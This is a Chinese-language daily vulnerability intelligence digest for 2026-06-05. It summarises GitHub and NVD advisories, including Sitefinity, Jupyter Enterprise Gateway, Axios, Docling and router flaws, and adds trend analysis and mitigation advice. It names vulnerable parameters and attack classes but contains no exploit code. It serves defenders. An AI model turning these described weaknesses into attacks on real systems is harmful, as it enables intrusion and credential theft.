📊 2026-06-05 漏洞情报日报 · 200 条 · 高危 101
每日漏洞情报汇总 · 2026-06-05
📊 2026-06-05 漏洞情报日报
📋 共 200 条
🔥 高危/严重 101 条
🐙 GitHub-Advisory 69 条 🔥30
🛡️ NVD-Latest 71 条 🔥71
⚔️ Sploitus 60 条
🤖 今日安全态势分析
🎯 今日重点关注
- Progress Sitefinity 多个严重漏洞 (CVE-2026-7312, CVE-2026-7198):CVSS 高达10.0和9.8。前者因凭据保护不足可致未认证攻击者窃取敏感信息;后者因访问控制不当可致未认证攻击者完全接管系统。影响多个版本,应立即排查。
- Jupyter Enterprise Gateway 模板注入与权限绕过 (CVE-2026-44180/1/2):三个严重漏洞组合。允许绕过Root限制启动容器、通过Jinja2模板注入执行任意代码,并可篡改Kubernetes YAML从而劫持容器安全上下文,对AI/ML基础设施威胁极大。
- Supply Chain投毒 @cap-js/openapi (GHSA-jpvj-wpmj-h7rv):恶意版本1.4.1于5月19日发布,会窃取主机凭证并尝试自我传播。这是典型的软件供应链攻击,所有使用了该包的环境均可能失陷。
- AVideo YPTSocket插件未认证存储型XSS (GHSA-8whc-2wmv-ww35):任何未认证用户可通过`page_title`参数注入持久化XSS,导致管理员或用户会话被劫持、恶意操作执行,影响所有使用AVideo的平台。
📈 威胁趋势
- 远程代码执行 / 命令注入 (9项):包含Jupyter Enterprise Gateway SSTI (CVE-2026-44181)、docker-wkhtmltopdf-aas OS命令注入 (CVE-2026-36576)、MCP-for-Stata命令注入 (CVE-2026-47708) 以及Hugging Face Transformers模型加载RCE (CVE-2026-5241)。攻击面覆盖开发工具、容器服务与AI框架。
- 权限提升与访问控制绕过 (4项):Jupyter Gateway Root绕过 (CVE-2026-44180)、Masteriyo LMS PRO越权 (CVE-2025-53209) 及Sitefinity访问控制缺陷 (CVE-2026-7198) 等,表明系统边界管控仍薄弱。
- 信息泄露与凭据安全 (3项):包括CVE-2026-7312 (Sitefinity凭据保护不足)、CVE-2026-35075 (固件内置硬编码密码) 以及Axios代理凭证泄露 (CVE-2026-44486/7)。敏感数据暴露风险持续升高。
- 软件供应链攻击 (1项):@cap-js/openapi投毒事件突出,攻击者正通过破坏可信上游组件来扩大攻击面。
🛡️ 缓解建议
- 立即升级与隔离:排查并升级 Progress Sitefinity、Jupyter Enterprise Gateway 至最新修复版本。对已安装 @cap-js/openapi@1.4.1 的系统立即断开网络、轮换所有暴露的凭证。
- 强化输入与输出校验:针对AVideo等Web应用,严格过滤用户输入的 `page_title` 等参数,启用内容安全策略 (CSP) 以防御XSS;对所有执行系统命令的接口参数进行白名单校验,防止命令注入。
- 审计开发与部署环境:检查Kubernetes环境中Jupyter Gateway的YAML配置,禁用不必要的环境变量注入;审查AI/ML模型加载路径,禁止从不可信仓库加载LightGlue等模型。
- 收紧网络与凭证策略:更新Axios至修复版本,避免代理凭证泄露;审查并更换所有固件中的硬编码密码;对暴露在公网的Sitefinity等CMS应用,立即启用多因素认证并限制API访问。
🐙 GitHub-Advisory(69 条)
Critical (6 条)
- GHSA-8whc-2wmv-ww35 - WWBN AVideo: Unauthenticated Stored DOM Cross-Site Scripting via Per-Client Meta Critical
# Unauthenticated Stored DOM XSS via `page_title` Broadcast in AVideo YPTSocket Plugin ## Summary A stored DOM Cross-Site Scripting vulnerability (CWE-79) in… - GHSA-jpvj-wpmj-h7rv - Supply chain compromise via malicious @cap-js/openapi Critical
Impact On May 19, 2026, a compromised version of @cap-js/openapi@1.4.1 was published. The malicious packages harvested credentials and attempted… - CVE-2026-47708 - MCP-for-Stata: Command injection via log_file_name parameter in Stata command wr
CVE-2026-47708Critical
Summary The `log_file_name` parameter in the `stata_do` API and CLI is directly interpolated into a Stata command string without sanitization. The security… - CVE-2026-44180 - Jupyter Enterprise Gateway: ContainerProcessProxy._enforce_prohibited_ids Bypass
CVE-2026-44180Critical
Summary Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be… - CVE-2026-44181 - Jupyter Enterprise Gateway: Jinja2 Template Server Side Template Injection resul
CVE-2026-44181Critical
Summary The environment variables (`KERNEL_XXX`) used during the rendering of the Kubernetes manifest are vulnerable to Server Side Template Injection (SSTI).… - CVE-2026-44182 - Jupyter Enterprise Gateway: Kubernetes Manifest Injection in Jinja2 Template Ren
CVE-2026-44182Critical
Summary The environment variables used during the rendering of the Kubernetes manifest allow YAML injection, enabling attackers to overwrite existing keys like…
High (24 条)
- CVE-2026-44486 - Axios: Proxy-Authorization header leaks to redirect target when proxy is re-eval
CVE-2026-44486High
Summary Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated… - CVE-2026-44487 - Axios: Proxy-Authorization Credential Leak to Origin Server Across HTTP-to-HTTPS
CVE-2026-44487High
## Summary Axios’s Node.js HTTP adapter may forward a `Proxy-Authorization` header to a redirected origin during specific proxy-to-direct redirect flows. This… - CVE-2026-44488 - Allocation of Resources Without Limits or Throttling in Axios
CVE-2026-44488High
## Summary Axios versions `1.7.0` through `1.15.x` did not enforce configured request and response size limits when requests were sent with the `fetch`… - CVE-2026-44496 - Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection
CVE-2026-44496High
## Summary Axios versions before `0.32.0` on the `0.x` line and before `1.16.0` on the `1.x` line build a regular expression from the configured XSRF cookie… - CVE-2026-45337 - Better Auth: Device authorization approve and deny accept any authenticated sess
CVE-2026-45337High
Am I affected? You are affected if all of the following are true: - You use `better-auth` at a version `>= 1.6.0, < 1.6.11`. - The `deviceAuthorization` plugin… - CVE-2026-45730 - Nuclio: Missing authorization on project write paths allows any authenticated us
CVE-2026-45730High
This vulnerability exists in Nuclio Dashboard's project management API, allowing any authenticated user (without membership in the target project) to bypass… - CVE-2026-34077 - React Router vulnerable to Denial of Service via reflected user input in single
CVE-2026-34077High
A DoS vulnerability exists in the React Router v7 [Framework Mode](https://reactrouter.com/start/modes#framework), as well as Remix v2.9.0+ with [Single… - GHSA-74m6-4hjp-7226 - Klever-Go P2P MultiDataInterceptor leaks global throttler slots on malformed com High
## Publisher note **Fixed in `v1.7.17`.** Operators running `< v1.7.17` should upgrade. The decompression-error path in… - CVE-2026-47696 - WWBN AVideo: Authenticated wallet credit bypass in AuthorizeNet processPayment e
CVE-2026-47696High
Summary `plugin/AuthorizeNet/processPayment.json.php` credits the logged-in user's wallet based only on the attacker-controlled `amount` POST parameter. The… - CVE-2026-49279 - WWBN AVideo: Stored XSS via autoEvalCodeOnHTML Bypass in MessageSQLite WebSocket
CVE-2026-49279High
# AVideo: Stored XSS via `autoEvalCodeOnHTML` in MessageSQLite WebSocket Handler ## Summary AVideo has a stored XSS vulnerability in the WebSocket messaging… - CVE-2024-52011 - launch-editor vulnerable to command injection via the crafted request on Windows
CVE-2024-52011High
Summary Due to the insufficient sanitization of the `file` argument in the `launchEditor`, an attacker can execute arbitrary commands on Windows by supplying a… - CVE-2026-44017 - Docling: Unsafe Zip Extraction in EasyOCR Model Download
CVE-2026-44017High
Impact In versions `< 2.91.0`, The EasyOCR model download functionality extracted ZIP archives without validating member paths, enabling Zip Slip attacks. If… - CVE-2026-33245 - React Router vulnerable to XSS in unstable RSC redirect handling via javascript:
CVE-2026-33245High
When using React Router v7's unstable RSC APIs, there exists a potential client-side XSS issue in the RSC redirect handling if redirects are coming from… - CVE-2026-41234 - Froxlor: BIND Zone File Injection via TXT Record Content
CVE-2026-41234High
## Summary The `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled… - CVE-2026-42211 - React Router's vendored turbo-stream v2 allows arbitrary constructor invocation
CVE-2026-42211High
When using React Router v7 in [Framework Mode](https://reactrouter.com/start/modes#framework), there exists a combination of steps that could potentially allow… - CVE-2026-42342 - React Router vulnerable to DoS via unbounded path expansion in __manifest endpoi
CVE-2026-42342High
There exists a potential DOS attack vector in React Router Framework Mode applications (as well as Remix v2.10.0 - 2.17.4). Certain requests can be crafted to… - CVE-2026-44016 - Docling: Unsafe Playwright-based HTML Rendering
CVE-2026-44016High
Impact In versions `>= 2.82.0, < 2.91.0`, if the HTML backend was explicitly configured for rendering (rendering option by default deactivated), then the… - CVE-2026-44020 - Docling: Unsafe XML Entity Expansion in USPTO Patent Backend
CVE-2026-44020High
Impact The USPTO patent XML parser used the standard `xml.sax.parseString()` without protection against XML External Entity (XXE) attacks. An attacker could… - CVE-2026-47214 - Docling: Unsafe URI and Path Handling in HTML Backend
CVE-2026-47214High
Impact The HTML backend did not perform sufficient validation during resource handling: - Accepted `file://` URIs enabling local file system access when… - CVE-2026-44019 - Docling Core: Insufficient validation of image reference URIs
CVE-2026-44019High
Impact In versions `>= 2.5.0, < 2.74.1`, `docling-core` could allow local `file://` image references and accepted inline `data:` content without a… - CVE-2026-44023 - Docling Core: Unsafe remote filename resolution
CVE-2026-44023High
Impact In versions `>= 1.5.0, < 2.74.1`, `docling-core` did not sufficiently restrict remote request destinations and could resolve a server-provided… - CVE-2026-49144 - browserstack-runner has an unauthenticated arbitrary file read via path traversa
CVE-2026-49144High
## Summary The HTTP server in browserstack-runner serves files from the project directory via the `_default` handler. This handler uses… - CVE-2026-49143 - browserstack-runner vulnerable to Remote Code Execution via vm sandbox escape in
CVE-2026-49143High
Summary The HTTP handler `/_log` in `lib/server.js` (lines 491–515) of browserstack-runner passes unauthenticated user-supplied data to `vm.runInNewContext()`… - GHSA-f9rx-7wf7-jr36 - Froxlor's API Authentication bypasses 2FA Authentication
CVE-2023-3173High
## Summary Froxlor's API authentication (`FroxlorRPC::validateAuth`) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on…
Medium (37 条)
- CVE-2026-48710 - Starlette has missing Host header validation that poisons request.url.path, bypa
CVE-2026-48710Medium
Summary In affected versions, the HTTP `Host` request header was not validated before being used to reconstruct `request.url`. Because the routing algorithm… - CVE-2026-44889 - WebOb: Location header normalization during redirect leads to open redirect - ag
CVE-2026-44889Medium
Impact When WebOb normalizes the HTTP Location header to include the request hostname, it does so by parsing the URL that the user is to be redirected to with… - CVE-2026-44476 - Doorkeeper Openid Connect: Dynamic Client Registration feature creates public cl
CVE-2026-44476Medium
Impact The `DynamicClientRegistrationController#register` action hard-codes `confidential: false` when creating applications… - CVE-2026-47706 - Strawberry GraphQL has a Circular Fragment Reference DOS
CVE-2026-47706Medium
Summary The QueryDepthLimiter extension is vulnerable to an Application-level DOS due to a lack of cycle detection in fragment spreads. When a query contains… - CVE-2026-47707 - Strawberry GraphQL's Bypass of MaxAliasesLimiter via Fragment Spreads leading to
CVE-2026-47707Medium
Summary The MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly… - CVE-2026-45056 - Matrix Rust SDK: Sender-binding gaps in to-device and room-key attribution
CVE-2026-45056Medium
Impact The `matrix-sdk-crypto` crate before 0.16.1 is missing a check for the sender's user ID when decrypting an Olm-encrypted to-device message containing… - CVE-2026-45057 - matrix-sdk-ui: Incomplete edit validation
CVE-2026-45057Medium
Impact The message edit validation logic in the `matrix-sdk-ui` crate before 0.16.1 is missing a check: when replacing an encrypted event, the replacement… - CVE-2026-47215 - Singluarity: Incorrect path matching for 'limit container paths' directive
CVE-2026-47215Medium
Impact The `limit container paths` directive in `singularity.conf` is intended to allow a system administrator limit the paths from which containers can be…
…另有 29 条 Medium 级漏洞(已省略)
Low (2 条)
- CVE-2026-47192 - kas's late signature validation may allow unnoticed repository manipulations
CVE-2026-47192Low
Impact So far, kas checks out and processes repositories regarding configuration includes prior to validating signatures of those repositories. This may allow… - CVE-2026-48011 - Shopware: Timing-attack on admin panel allowing enumeration of administrator use
CVE-2026-48011Low
Summary There is a Proof of Concept which is able to enumerate the usernames of administrator users. This was possible by performing a timing attack. Details…
🛡️ NVD-Latest(71 条)
Critical (10 条)
- CVE-2026-7312 CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefi
CVE-2026-7312Critical 10.0
CVE-2026-7312 CVSS:10.0 CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefinity version from 14.0.7700 to 14.4.8152, and 15.0.8200… - CVE-2025-14771 Files or directories accessible to external parties vulnerability in ABB T-MAC P
CVE-2025-14771Critical 9.9
CVE-2025-14771 CVSS:9.9 Files or directories accessible to external parties vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. 产品: abb… - CVE-2026-36576 An OS command injection vulnerability in the app.py component of openlabs docker
CVE-2026-36576Critical 9.8
CVE-2026-36576 CVSS:9.8 An OS command injection vulnerability in the app.py component of openlabs docker-wkhtmltopdf-aas up to commit 9f50579 allows attackers… - CVE-2026-35075 An unauthenticated remote attacker can recover a default, hard coded password fr
CVE-2026-35075Critical 9.8
CVE-2026-35075 CVSS:9.8 An unauthenticated remote attacker can recover a default, hard coded password from a firmware image and thus gain full access to all… - CVE-2026-47065 ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via j
CVE-2026-47065Critical 9.8
CVE-2026-47065 CVSS:9.8 ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy Assessment: Fully addressed.… - CVE-2026-7198 CWE-284: Improper Access Control in web services in Progress Sitefinity 15.4.862
CVE-2026-7198Critical 9.8
CVE-2026-7198 CVSS:9.8 CWE-284: Improper Access Control in web services in Progress Sitefinity 15.4.8623 before 15.4.8630 allows a remote unauthenticated… - CVE-2025-53209 Incorrect Privilege Assignment vulnerability in Themeisle Masteriyo LMS PRO allo
CVE-2025-53209Critical 9.8
CVE-2025-53209 CVSS:9.8 Incorrect Privilege Assignment vulnerability in Themeisle Masteriyo LMS PRO allows Privilege Escalation. This issue affects Masteriyo… - CVE-2026-5241 A vulnerability in the LightGlue model loading path of huggingface/transformers
CVE-2026-5241Critical 9.6
CVE-2026-5241 CVSS:9.6 A vulnerability in the LightGlue model loading path of huggingface/transformers version 5.2.0 allows an attacker-controlled model… - CVE-2026-42684 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-42684Critical 9.3
CVE-2026-42684 CVSS:9.3 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ahmad WP Job Portal allows Blind… - CVE-2026-36748 RockRMS v16.13 and before v.17.7.0 is vulnerable to Cross Site Scripting (XSS) v
CVE-2026-36748Critical 9.0
CVE-2026-36748 CVSS:9.0 RockRMS v16.13 and before v.17.7.0 is vulnerable to Cross Site Scripting (XSS) via Social Media links in user profile. 产品:
High (61 条)
- CVE-2026-36608 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows UPnP AddP
CVE-2026-36608High 8.8
CVE-2026-36608 CVSS:8.8 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows UPnP AddPortMapping to forward external ports to the router's… - CVE-2026-36607 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows unauthent
CVE-2026-36607High 8.8
CVE-2026-36607 CVSS:8.8 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows unauthenticated brute-force attacks via the TDDP password change… - CVE-2026-35085 A remote attacker with user privileges can exploit a stack buffer overflow in gd
CVE-2026-35085High 8.8
CVE-2026-35085 CVSS:8.8 A remote attacker with user privileges can exploit a stack buffer overflow in gdv-serverconfig to gain full system access as root. 产品: - CVE-2026-35084 A remote attacker with user privileges can exploit a stack buffer overflow in da
CVE-2026-35084High 8.8
CVE-2026-35084 CVSS:8.8 A remote attacker with user privileges can exploit a stack buffer overflow in dali-devconfig to gain full system access as root. 产品: - CVE-2026-35083 A remote attacker with user privileges can exploit a stack buffer overflow to ga
CVE-2026-35083High 8.8
CVE-2026-35083 CVSS:8.8 A remote attacker with user privileges can exploit a stack buffer overflow to gain full system access as root. 产品: - CVE-2026-35082 The ugw-logread method allows a remote attacker with user privileges to access a
CVE-2026-35082High 8.8
CVE-2026-35082 CVSS:8.8 The ugw-logread method allows a remote attacker with user privileges to access arbitrary local files due to insufficient validation of… - CVE-2025-15656 Incorrect Privilege Assignment vulnerability in Mojoomla School Management allow
CVE-2025-15656High 8.8
CVE-2025-15656 CVSS:8.8 Incorrect Privilege Assignment vulnerability in Mojoomla School Management allows Privilege Escalation. This issue affects School… - CVE-2025-14772 Authorization bypass through User-Controlled key vulnerability in ABB T-MAC Plus
CVE-2025-14772High 8.8
CVE-2025-14772 CVSS:8.8 Authorization bypass through User-Controlled key vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. 产品: abb… - CVE-2026-30652 A remote buffer overflow vulnerability exists in the /cgi-bin/dido/setdo.cgi end
CVE-2026-30652High 8.8
CVE-2026-30652 CVSS:8.8 A remote buffer overflow vulnerability exists in the /cgi-bin/dido/setdo.cgi endpoint of the admin interface of Vivotek FD8136 cameras… - CVE-2026-30650 A post-authentication remote buffer overflow vulnerability exists in the /cgi-bi
CVE-2026-30650High 8.8
CVE-2026-30650 CVSS:8.8 A post-authentication remote buffer overflow vulnerability exists in the /cgi-bin/admin/eventtask.cgi endpoint of the admin interface… - CVE-2026-10591 Insufficient access control restrictions in the file write tool in Amazon Kiro I
CVE-2026-10591High 8.8
CVE-2026-10591 CVSS:8.8 Insufficient access control restrictions in the file write tool in Amazon Kiro IDE before version 0.11 might allow remote… - CVE-2026-7201 CWE-639: Authorization Bypass Through User-Controlled Key in web services in Pro
CVE-2026-7201High 8.8
CVE-2026-7201 CVSS:8.8 CWE-639: Authorization Bypass Through User-Controlled Key in web services in Progress Sitefinity 15.2.x before 15.2.8441, 15.3.x before… - CVE-2026-7195 CWE-20: Improper Input Validation in web services in Progress Sitefinity 14.1.x
CVE-2026-7195High 8.8
CVE-2026-7195 CVSS:8.8 CWE-20: Improper Input Validation in web services in Progress Sitefinity 14.1.x through 14.3.x, 14.4.x before 14.4.8152, 15.0.x before… - CVE-2025-53345 Missing Authorization vulnerability leading to code execution after installing m
CVE-2025-53345High 8.8
CVE-2025-53345 CVSS:8.8 Missing Authorization vulnerability leading to code execution after installing malicious vulnerable plugin in ThimPress Thim Core. This… - CVE-2026-7313 CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefi
CVE-2026-7313High 8.7
CVE-2026-7313 CVSS:8.7 CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefinity version from 8.0.5700 to 13.3.7652 allows a remote… - CVE-2026-20230 A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco U
CVE-2026-20230High 8.6
CVE-2026-20230 CVSS:8.6 A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management… - CVE-2019-25719 Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors
CVE-2019-25719High 8.6
CVE-2019-25719 CVSS:8.6 Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors running software versions VG4.1.1, VG4.0.3, and lower… - CVE-2026-10622 Improper Authentication in REST API in Collibra Agent, allows a remote unauthent
CVE-2026-10622High 8.2
CVE-2026-10622 CVSS:8.2 Improper Authentication in REST API in Collibra Agent, allows a remote unauthenticated attacker to access privileged functionality via… - CVE-2026-35081 The ugw-logstop method allows a remote attacker with user privileges to terminat
CVE-2026-35081High 8.1
CVE-2026-35081 CVSS:8.1 The ugw-logstop method allows a remote attacker with user privileges to terminate arbitrary processes due to insufficient validation of… - CVE-2026-35080 The ugw-restoreinfo method allows a remote attacker with user privileges to dele
CVE-2026-35080High 8.1
CVE-2026-35080 CVSS:8.1 The ugw-restoreinfo method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation… - CVE-2026-35079 The ugw-restore method allows a remote attacker with user privileges to delete a
CVE-2026-35079High 8.1
CVE-2026-35079 CVSS:8.1 The ugw-restore method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of… - CVE-2026-35078 The ugw-logstop method allows a remote attacker with user privileges to delete
CVE-2026-35078High 8.1
CVE-2026-35078 CVSS:8.1 The ugw-logstop method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of… - CVE-2026-35077 The ugw-delete-file method allows a remote attacker with user privileges to del
CVE-2026-35077High 8.1
CVE-2026-35077 CVSS:8.1 The ugw-delete-file method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient… - CVE-2026-35076 The bac-scanresult method allows a remote attacker with user privileges to delet
CVE-2026-35076High 8.1
CVE-2026-35076 CVSS:8.1 The bac-scanresult method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation… - CVE-2026-39555 Deserialization of Untrusted Data vulnerability in Elated-Themes Askka allows Ob
CVE-2026-39555High 8.1
CVE-2026-39555 CVSS:8.1 Deserialization of Untrusted Data vulnerability in Elated-Themes Askka allows Object Injection. This issue affects Askka: from n/a… - CVE-2026-39553 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-39553High 8.1
CVE-2026-39553 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes… - CVE-2026-39552 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-39552High 8.1
CVE-2026-39552 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Code Supply… - CVE-2025-69369 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-69369High 8.1
CVE-2025-69369 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes… - CVE-2025-68886 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-68886High 8.1
CVE-2025-68886 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in androThemes… - CVE-2025-58897 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-58897High 8.1
CVE-2025-58897 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes… - CVE-2025-58707 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-58707High 8.1
CVE-2025-58707 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes… - CVE-2026-39551 Deserialization of Untrusted Data vulnerability in Elated-Themes Töbel allows Ob
CVE-2026-39551High 8.1
CVE-2026-39551 CVSS:8.1 Deserialization of Untrusted Data vulnerability in Elated-Themes Töbel allows Object Injection. This issue affects Töbel: from n/a… - CVE-2026-39550 Deserialization of Untrusted Data vulnerability in Elated-Themes Aperitif allows
CVE-2026-39550High 8.1
CVE-2026-39550 CVSS:8.1 Deserialization of Untrusted Data vulnerability in Elated-Themes Aperitif allows Object Injection. This issue affects Aperitif: from… - CVE-2025-58705 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-58705High 8.1
CVE-2025-58705 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes… - CVE-2025-53440 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-53440High 8.1
CVE-2025-53440 CVSS:8.1 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes… - CVE-2026-5422 A path traversal vulnerability exists in jupyter-server version 2.17.0 due to an
CVE-2026-5422High 8.1
CVE-2026-5422 CVSS:8.1 A path traversal vulnerability exists in jupyter-server version 2.17.0 due to an incorrect root directory boundary check in the… - CVE-2025-14773 Improper neutralization of input during web page generation ('cross-site scripti
CVE-2025-14773High 8.0
CVE-2025-14773 CVSS:8.0 Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in ABB T-MAC Plus. This issue… - CVE-2026-40290 OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-s
CVE-2026-40290High 7.8
CVE-2026-40290 CVSS:7.8 OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using… - CVE-2022-49042 An inclusion of functionality from untrusted control sphere vulnerability in Min
CVE-2022-49042High 7.8
CVE-2022-49042 CVSS:7.8 An inclusion of functionality from untrusted control sphere vulnerability in MinGW DLL component in Synology Hyper Backup Explorer… - CVE-2022-49036 An inclusion of functionality from untrusted control sphere vulnerability in Ope
CVE-2022-49036High 7.8
CVE-2022-49036 CVSS:7.8 An inclusion of functionality from untrusted control sphere vulnerability in OpenSSL configuration in Synology Active Backup for… - CVE-2026-4035 A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolut
CVE-2026-4035High 7.7
CVE-2026-4035 CVSS:7.7 A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets,… - CVE-2025-15655 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2025-15655High 7.6
CVE-2025-15655 CVSS:7.6 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla School Management allows… - CVE-2026-37462 An integer underflow in the BGPUpdate.DecodeFromBytes function (/bgp/bgp.go) of
CVE-2026-37462High 7.5
CVE-2026-37462 CVSS:7.5 An integer underflow in the BGPUpdate.DecodeFromBytes function (/bgp/bgp.go) of gobgp v4.3.0 allows attackers to cause a Denial of… - CVE-2026-41032 It is possible for an unauthenticated adjacent attacker to download log files of
CVE-2026-41032High 7.5
CVE-2026-41032 CVSS:7.5 It is possible for an unauthenticated adjacent attacker to download log files of the controller, which may disclose some restricted… - CVE-2026-50031 ipmi-oem in FreeIPMI before 1.6.18 has exploitable buffer overflows on response
CVE-2026-50031High 7.5
CVE-2026-50031 CVSS:7.5 ipmi-oem in FreeIPMI before 1.6.18 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface… - CVE-2026-9516 Cpanel::JSON::XS versions before 4.41 for Perl allow denial of service via UTF-8
CVE-2026-9516High 7.5
CVE-2026-9516 CVSS:7.5 Cpanel::JSON::XS versions before 4.41 for Perl allow denial of service via UTF-8 BOM prefixed input when a decode filter callback… - CVE-2026-10621 Path traversal in restore handler in Collibra Agent, allows an attacker to write
CVE-2026-10621High 7.5
CVE-2026-10621 CVSS:7.5 Path traversal in restore handler in Collibra Agent, allows an attacker to write arbitrary files via a crafted ZIP archive. Collibra… - CVE-2026-42670 Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star
CVE-2026-42670High 7.5
CVE-2026-42670 CVSS:7.5 Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly… - CVE-2026-42669 Missing Authorization vulnerability in EventPrime allows Exploiting Incorrectly
CVE-2026-42669High 7.5
CVE-2026-42669 CVSS:7.5 Missing Authorization vulnerability in EventPrime allows Exploiting Incorrectly Configured Access Control Security Levels. This issue… - CVE-2025-58024 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-58024High 7.5
CVE-2025-58024 CVSS:7.5 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in UnboundStudio… - CVE-2025-14774 Incorrect Authorization vulnerability in ABB T-MAC Plus. This issue affects T-M
CVE-2025-14774High 7.4
CVE-2025-14774 CVSS:7.4 Incorrect Authorization vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. 产品: abb t-mac_plus - CVE-2026-10629 SIP signaling stack in Verizon IMS (unspecified version) implements SIP signalin
CVE-2026-10629High 7.4
CVE-2026-10629 CVSS:7.4 SIP signaling stack in Verizon IMS (unspecified version) implements SIP signaling without IPsec integrity protection (missing… - CVE-2026-36611 Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of un
CVE-2026-36611High 7.3
CVE-2026-36611 CVSS:7.3 Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of uninitialized buffer when receiving POST requests without… - CVE-2026-36609 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 uses a static au
CVE-2026-36609High 7.3
CVE-2026-36609 CVSS:7.3 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 uses a static authentication nonce that does not change between… - CVE-2026-10704 A vulnerability was detected in SourceCodester Pizzafy E-Commerce System 1.0. Af
CVE-2026-10704High 7.3
CVE-2026-10704 CVSS:7.3 A vulnerability was detected in SourceCodester Pizzafy E-Commerce System 1.0. Affected by this vulnerability is the function Login of… - CVE-2026-9334 Cpanel::JSON::XS versions before 4.41 for Perl allow type confusion via duplicat
CVE-2026-9334High 7.3
CVE-2026-9334 CVSS:7.3 Cpanel::JSON::XS versions before 4.41 for Perl allow type confusion via duplicate object keys when dupkeys_as_arrayref is enabled.… - CVE-2026-10694 A vulnerability was detected in SourceCodester Online Food Ordering System 2.0.
CVE-2026-10694High 7.3
CVE-2026-10694 CVSS:7.3 A vulnerability was detected in SourceCodester Online Food Ordering System 2.0. Affected by this issue is the function include of the… - CVE-2026-30649 Buffer Overflow vulnerability in VIVOTEK INC FD8136-VVTK-0300a allows a remote a
CVE-2026-30649High 7.3
CVE-2026-30649 CVSS:7.3 Buffer Overflow vulnerability in VIVOTEK INC FD8136-VVTK-0300a allows a remote attacker to execute arbitrary code via the… - CVE-2026-36606 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 encrypts configu
CVE-2026-36606High 7.1
CVE-2026-36606 CVSS:7.1 Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 encrypts configuration backups with a hardcoded DES key using single… - CVE-2025-15654 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripti
CVE-2025-15654High 7.1
